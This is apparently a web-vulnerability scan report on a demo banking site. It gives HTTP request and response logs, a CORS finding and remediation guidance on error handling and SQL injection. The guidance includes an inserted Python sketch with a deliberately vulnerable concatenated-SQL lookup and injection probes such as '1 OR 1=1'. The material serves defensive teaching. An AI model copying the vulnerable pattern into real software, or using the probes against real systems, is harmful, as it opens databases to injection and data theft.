Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 8561
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/online-banking.html

Request:
GET /online-banking.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="0961B4C9AB7ECE8F80F1EFC03677941C";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="280"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="2417e755-ecd4-476f-bab2-545851db8ef2";
X-Request-Memo: ID="3d024962-1255-43ef-accb-b591ed98e3ac"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11338
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/currencies.html

Request:
GET /admin/currencies.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="0CE5ABD84AD968C95357799ACE262859";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="606cd668-ba36-4158-9d34-e877b5e4800e";
X-Request-Memo: ID="a38c463b-f21e-483b-b432-9225a2ec0089"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=AF5EC584
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 10569
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/index.html

Request:
GET /admin/index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="0CF01A02A1917FDBDF9FF1C597F1495C";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e6f10847-378c-4724-90bc-ac074fc8b5b0";
X-Request-Memo: ID="b4bd0c76-c126-434f-9e68-75ad136db2b2"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=680DCF39
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 6602
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/index.html

Request:
GET /index.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="8E73B3A63EFE2AADE20745A947151EB3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="282";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4a1b3643-8285-4215-a9a5-d69cb8fcec75";
X-Request-Memo: ID="c004c495-5a88-4e8a-986e-61fe5c86b0e3"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 12456
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/users.html

Request:
GET /admin/users.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="810BCB46E8C09C737ECDC561083681F4";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="7916c964-49d2-4e52-a3d3-5fc08c602847";
X-Request-Memo: ID="3811efb9-c4e3-4c9a-a336-fae774879fd7"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=400B9B5C
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 10793
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/search.html?searchTerm=12345

Request:
GET /search.html?searchTerm=12345 HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="4FB1E28C3A3C661502F583F3EA8F6277";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="action"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="282";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="47285469-80aa-457f-b7a7-463caf37d211";
X-Request-Memo: ID="7c5328cd-1699-4712-b23e-8d196c922a1c"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 7710
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/sendFeedback.html

Request:
POST /sendFeedback.html HTTP/1.1
Referer: http://zero.webappsecurity.com/feedback.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="A8191E30A6A6D05B7ECBC975A580DB55";
PSID="EA0F5B4A7B2D5822D3AE6FEB6AC0B160"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="action"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed4543ab-71ec-4a96-9342-8d2a2fcf61d6";
X-Request-Memo: ID="43763112-cd18-42cc-8477-6bef3d5757c9"; sc="2"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
name=Jason&email=John.Doe%40somewhere.com&subject=12345&comment=12345&submit=Send%20Message
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 6647
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/admin/

Request:
GET /admin/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="B09C4D5CC22F10C01D9D84418780B93D";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10210"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="44b684c9-a38e-482f-b7ae-2cf445d55017";
X-Request-Memo: ID="797be3c0-690f-46e4-a978-485cb342bb23"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:11 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 6602
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/feedback.html

Request:
GET /feedback.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="EA0F5B4A7B2D5822D3AE6FEB6AC0B160";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="280"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="de93f96d-9d6a-49c5-a412-bd229fb62e64";
X-Request-Memo: ID="904411d1-9183-4395-bae3-a54905ef5a19"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:25 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9243
...TRUNCATED...pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>...TRUNCATED..."controls pictured">
<input type="text" id="name" name="name"
placeholder="Your Name" required="" tabindex="1"/>
<i class="icon-user"...TRUNCATED..."controls pictured">
<input type="text" id="email" name="email"
placeholder="Your email address" required=""
tabindex="2"/>
<i class="icon-envel...TRUNCATED..."controls pictured">
<input type="text" id="subject" name="subject"
placeholder="Subject" required="" tabindex="3"/>
<i class="icon-flag"...TRUNCATED...

HTML5: CORS Functionality Abuse


Page:


http://zero.webappsecurity.com:80/resources/js/placeholders.min.js

Request:
GET /resources/js/placeholders.min.js HTTP/1.1
Referer: http://zero.webappsecurity.com/
Host: zero.webappsecurity.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-AscRawUrl: /resources/js/placeholders.min.js
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="511D6DB521E43A071D015EA7E62869D3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="ScriptInclude"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="216"; ThreadType="JScriptEvent";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b3b66bc-ee7e-418f-a2ff-72824c2c8770";
X-Request-Memo: ID="ba10ebcc-36c7-4b8b-a7d2-a65d07b35ed5"; sc="1"; ThreadId="216";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:31 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"5615-1360116138000"
Last-Modified: Wed, 06 Feb 2013 02:02:18 GMT
Cache-Control: max-age=2678400
Expires: Thu, 10 Nov 2016 07:50:31 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 5615
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
var Placeholders=function(){var validTypes=["text","search","url","tel","email","password","number","textarea"],settings=
{live:false,hideOnFocus:false,className:"placeholderspolyfill",textColor:"#999",styleImportant:true},badKeys=
[37,38,39,40],interval,valueKeyDown,classNameRegExp=new RegExp("\\b"+settings.className+"\\b");function cursorToStart
(elem){var range;if(elem.createTextRange){range=elem.createTextRange();range.move("character",0);range.select()}else if
(elem.selectionStart){elem.focus();
elem.setSelectionRange(0,0)}}function focusHandler(){var type;if(this.value===this.getAttribute("placeholder"))if(!
settings.hideOnFocus)cursorToStart(this);else{this.className=this.className.replace
(classNameRegExp,"");this.value="";type=this.getAttribute("data-placeholdertype");if(type)this.type=type}}function blurHandler()
{var type;if(this.value===""){this.className=this.className+" "+settings.className;this.value=this.getAttribute
("placeholder");type=this.getAttribute("data-placeholdertype");if(type)this.type=
"text"}function submitHandler(){var inputs=this.getElementsByTagName("input"),textareas=this.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,element,placeholder,i;for(i=0;i<num;i+=1)
{element=i<numInputs?inputs[i]:textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if
(element.value===placeholder)element.value=""}}function keydownHandler(event)
{valueKeyDown=this.value;return!(valueKeyDown===this.getAttribute("placeholder")&&badKeys.indexOf
(event.keyCode)>
-1)}function keyupHandler(){var type;if(this.value!==valueKeyDown){this.className=this.className.replace
(classNameRegExp,"");this.value=this.value.replace(this.getAttribute("placeholder"),"");type=this.getAttribute
("data-placeholdertype");if(type)this.type=type}if(this.value===""){blurHandler.call(this);cursorToStart(this)}}
function addEventListener(element,event,fn){if(element.addEventListener)return element.addEventListener
(event,fn.bind(element),false);if(element.attachEvent)return element.attachEvent("on"+
event,fn.bind(element))}function addEventListeners(element){if(!settings.hideOnFocus){addEventListener
(element,"keydown",keydownHandler);addEventListener(element,"keyup",keyupHandler)}addEventListener
(element,"focus",focusHandler);addEventListener(element,"blur",blurHandler)}function updatePlaceholders(){var
inputs=document.getElementsByTagName("input"),textareas=document.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,form,element,oldPlaceholder,newPlaceholder;
for(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:textareas[i-numInputs];newPlaceholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.type)>-1)if
(newPlaceholder){oldPlaceholder=element.getAttribute("data-currentplaceholder");if(newPlaceholder!
==oldPlaceholder){if(element.value===oldPlaceholder||element.value===newPlaceholder||!element.value)
{element.value=newPlaceholder;element.className=element.className+" "+settings.className}if(!
oldPlaceholder){if(element.form){form=element.form;
if(!form.getAttribute("data-placeholdersubmit")){addEventListener
(form,"submit",submitHandler);form.setAttribute("data-placeholdersubmit","true")}}addEventListeners(element)}
element.setAttribute("data-currentplaceholder",newPlaceholder)}}}}function createPlaceholders(){var
inputs=document.getElementsByTagName("input"),textareas=document.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,element,form,placeholder;for
(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:
textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.typ
...TRUNCATED...
Web Server Misconfiguration: Insecure Content-Type Setting
Page:


http://zero.webappsecurity.com:80/docs/appdev/sample/

Request:
GET /docs/appdev/sample/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="B2C4DB9BD43BD67F563C5590060864D1";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b67d6926-e16e-4203-8af2-9905667eb186";
X-Request-Memo: ID="aecfdea2-744b-43a1-a28c-4004b66050ab"; sc="2"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:20 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"1852-1466008838000"
Last-Modified: Wed, 15 Jun 2016 16:40:38 GMT
Content-Type: text/html
Content-Length: 1852
Keep-Alive: timeout=5, max...TRUNCATED...

Appendix (Check Descriptions)


Poor Error Handling: Unhandled Exception ( 742 )
Summary
Critical database server error message vulnerabilities were identified in the web application, indicating that an unhandled
exception was generated in your web application code. Unhandled exceptions are circumstances in which the application has
received user input that it did not expect and does not know how to handle. When successfully exploited, an attacker can gain
unauthorized access to the database by using the information recovered from seemingly innocuous error messages to pinpoint
flaws in the web application and to discover additional avenues of attack. Recommendations include designing and adding
consistent error-handling mechanisms that are capable of handling any user input to your web application, providing
meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from
being displayed.
Description
The most common cause of an unhandled exception is a failure to properly sanitize client-supplied data that is used in SQL
statements. They can also be caused by a bug in the web application's database communication code, a misconfiguration of
database connection settings, an unavailable database, or any other reason that would cause the application's database driver
to be unable to establish a working session with the server. The problem is not that web applications generate errors. All web
applications in their normal course of operation will at some point receive an unhandled exception. The problem lies not in
that these errors were received, but rather in how they are handled. Any error handling solution needs to be well-designed,
and uniform in how it handles errors. For instance, assume an attacker is attempting to access a specific file. If the request
returns a "File not Found" error, the attacker can be relatively sure the file does not exist. However, if the error returns
"Permission Denied," the attacker has a fairly good idea that the specific file does exist. This can be helpful to an attacker in
many ways, from determining the operating system to discovering the underlying architecture and design of the application.
The error message may also contain the location of the file that contains the offending function. This may disclose the
webroot's absolute path as well as give the attacker the location of application "include" files or database configuration
information. A fundamental necessity for a successful attack upon your web application is reconnaissance. Database server
error messages can provide information that can then be utilized when the attacker is formulating his next method of attack.
It may even disclose the portion of code that failed.
Be aware that this check is part of unknown application testing which seeks to uncover new vulnerabilities in both custom and
commercial software. Because of this, there are no specific patches or remediation information for this issue. Please note that
this vulnerability may be a false positive if the page it is flagged on is technical documentation relating to a database server.

Execution
The ways in which an attacker can exploit the conditions that caused the error depend on its cause. In the case of SQL
injection, the techniques that are used will vary from database server to database server, and even query to query. An in-depth guide to SQL Injection attacks is available at http://download.hpsmartupdate.com/asclabs/sql_injection.pdf, or in the
SQL Injection vulnerability information, accessible via the Policy Manager. Primarily, the information gleaned from database
server error messages is what will allow an attacker to conduct a successful attack after he combines his various findings.

Implication
The severity of this vulnerability depends on the reason that the error message was generated. In most cases, it will be the
result of the web application attempting to use an invalid client-supplied argument in a SQL statement, which means that SQL
injection will be possible. If so, an attacker will often be able to read the contents of the entire database.
Depending on the database server and the SQL statement, deleting, updating and adding records and executing arbitrary
commands may also be possible. If a software bug is responsible for triggering the error, the potential impact will vary,
depending on the circumstances. The location of the application that caused the error can be useful in facilitating other kinds
of attacks. If the file is a hidden or include file, the attacker may be able to gain more information about the mechanics of the
web application, possibly even the source code. Application source code is likely to contain usernames, passwords, database
connection strings and aids the attacker greatly in discovering new vulnerabilities.

Fix
For Development:
From a development perspective, the best method of preventing problems from arising from database error messages is to
adopt secure programming techniques that prevent problems that might arise from an attacker discovering too much
information about the architecture and design of your web application. The following recommendations can be used as a basis
for that.
Stringently define the data type (for instance, a string, an alphanumeric character, etc) that the application will accept.
Validate against an allow-list of what is good rather than a deny-list of what is bad, and reject input containing improper characters.
Do not display error messages to the end user that provide information (such as table names) that could be utilized in
orchestrating an attack.
Define the allowed set of characters. For instance, if a field is to receive a number, only let that field accept numbers.
Define the maximum and minimum data lengths for what the application will accept.
Specify acceptable numeric ranges for input.
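As an added illustration of the development recommendations above (this is not code from the report or from the scanned application), the following Python sketch puts a deliberately vulnerable account lookup beside a hardened one. The in-memory SQLite table, the account-lookup handlers and the correlation-id scheme are constructed for the example; a real application would return the same (status, body) pairs through its web framework.

```python
import logging
import re
import sqlite3
import uuid

log = logging.getLogger("accounts")


# Constructed stand-in for the application's database: one table, two rows.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance REAL)")
    conn.executemany("INSERT INTO accounts (owner, balance) VALUES (?, ?)",
                     [("alice", 120.0), ("bob", 75.5)])
    conn.commit()
    return conn


def vulnerable_lookup(conn, account_id):
    """The anti-pattern: the parameter is concatenated into SQL and the raw
    driver message is handed back to the client as (status, body)."""
    try:
        row = conn.execute(
            "SELECT owner, balance FROM accounts WHERE id = " + account_id
        ).fetchone()
    except sqlite3.Error as exc:
        # Exactly what the scanner flags: parser and schema details leak to the user.
        return 500, "Internal Server Error: %s" % exc
    if row is None:
        return 404, "Account not found"
    return 200, {"owner": row[0], "balance": row[1]}


# Stringent data type: an account id is 1 to 10 ASCII digits; nothing else reaches the query.
ACCOUNT_ID = re.compile(r"[0-9]{1,10}")


def hardened_lookup(conn, account_id):
    """Allow-list validation, a parameterised statement, and a generic error
    whose reference id lets support find the full exception in the server log."""
    if not ACCOUNT_ID.fullmatch(account_id):
        return 400, "Invalid account id"
    try:
        row = conn.execute(
            "SELECT owner, balance FROM accounts WHERE id = ?", (int(account_id),)
        ).fetchone()
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("ref=%s database error: %s", ref, exc)  # detail stays server-side
        return 500, "An internal error occurred (reference %s)" % ref
    if row is None:
        return 404, "Account not found"
    return 200, {"owner": row[0], "balance": row[1]}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "x", "1 OR 1=1"):
        print("vulnerable", repr(probe), vulnerable_lookup(db, probe))
        print("hardened  ", repr(probe), hardened_lookup(db, probe))
```

Run it and compare the two columns: a stray quote or an unknown column name makes the vulnerable handler echo the SQLite parser message, and `1 OR 1=1` silently returns the first account, whereas the hardened handler rejects all three at validation time and would never expose a driver message even if the query itself failed.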
For Security Operations:

The following recommendations will help in implementing a secure database protocol for your web application. Be advised
each database has its own method of secure lock down.

ODBC Error Messaging: Turn off ODBC error messaging in your database server. Never display raw ODBC or other
errors to the end user. See Removing Detailed Error Messages below, or consult your database server's documentation,
for more information.
Uniform Error Codes: Ensure that you are not inadvertently supplying information to an attacker via the use of
inconsistent or "conflicting" error messages. For instance, don't reveal unintended information by utilizing error messages
such as Access Denied, which will also let an attacker know that the file he seeks actually exists. Have consistent
terminology for files and folders that do exist, do not exist, and which have read access denied.
Informational Error Messages: Ensure that error messages do not reveal too much information. Complete or partial
paths, variable and file names, row and column names in tables, and specific database errors should never be revealed
to the end user. Remember, an attacker will gather as much information as possible, and then add pieces of seemingly
innocuous information together to craft a method of attack.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems.
Do not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
Stored Procedures: Consider using stored procedures. They require a very specific parameter format, which makes
them less susceptible to SQL Injection attacks, provided the procedure itself does not assemble dynamic SQL from its arguments.
Database Privileges: Utilize a least-privileges scheme for the database application. Ensure that user accounts only
have the limited functionality that is actually required. All database mechanisms should deny access until it has been
granted, not grant access until it has been denied.

For QA:

In reality, simple testing can usually determine how your web application will react to different input errors. More expansive
testing must be conducted to cause internal errors to gauge the reaction of the site. If the unhandled exception occurs in a
piece of in-house developed software, consult the developer. If it is in a commercial package, contact technical support.

The best course of action for QA associates to take is to ensure that the error handling scheme is consistent. Do you receive a
